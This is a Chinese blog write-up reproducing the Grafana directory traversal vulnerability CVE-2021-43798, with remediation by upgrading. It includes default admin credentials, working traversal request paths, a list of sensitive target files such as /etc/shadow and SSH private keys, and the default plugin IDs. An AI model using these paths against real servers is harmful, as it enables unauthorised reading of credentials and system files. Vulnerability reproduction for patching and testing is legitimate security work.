grafana目录遍历(CVE-2021-43798)

Grafana8.0.0-beta1到8.3.0版本存在目录遍历漏洞,允许通过特定URL访问本地文件。漏洞可通过修改登录后请求数据实现,影响范围包括配置文件、数据库等。GrafanaCloud不受影响,建议用户尽快升级到安全补丁8.0.7及以上版本。
摘要由CSDN通过智能技术生成

漏洞描述:

 Grafana 是一个用于监控和可观察性的开源平台。Grafana 版本 8.0.0-beta1 到 8.3.0(补丁版本除外)容易受到目录遍历,允许访问本地文件。易受攻击的 URL 路径是:<grafana_host_url>/public/plugins//,其中是任何已安装插件的插件 ID。Grafana Cloud 在任何时候都不会受到攻击。建议用户升级到补丁版本 8.0.7、8.1.8、8.2.7 或 8.3.1。GitHub 安全公告包含有关易受攻击的 URL 路径、缓解措施和披露时间表的更多信息。

复现过程:

1.访问ip:port,跳转到登录页面

账号:admin

密码:admin

2.抓取登录后页面的包

3.读取etc/passwd:将GET后面的数据进行修改 ,改为

/public/plugins/gettingstarted/../../../../../../../../../../../../../../../etc/passwd

 

4.读取配置文件:

/public/plugins/gettingstarted/../../../../../../../../../../../../../../../etc/grafana/grafana.ini

 

5.读取数据库:

/public/plugins/gettingstarted/../../../../../../../../../../../../../../../var/lib/grafana/grafana.db

 

6.读取其它文件:

/conf/defaults.ini

/etc/grafana/grafana.ini

/etc/passwd

/etc/shadow

/home/grafana/.bash_history

/home/grafana/.ssh/id_rsa

/root/.bash_history

/root/.ssh/id_rsa

/usr/local/etc/grafana/grafana.ini

/var/lib/grafana/grafana.db

/proc/net/fib_trie

/proc/net/tcp

/proc/self/cmdline

默认安装插件列表:

alertlist

annolist

grafana-azure-monitor-datasource

barchart

bargauge

cloudwatch

dashlist

elasticsearch

gauge

geomap

gettingstarted

stackdriver

graph

graphite

heatmap

histogram

influxdb

jaeger

logs

loki

mssql

mysql

news

nodeGraph

opentsdb

piechart

pluginlist

postgres

prometheus

stat

state-timeline

status-history

table

table-old

tempo

testdata

text

timeseries

welcome

Zipkin

修复方式:

升级版本

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值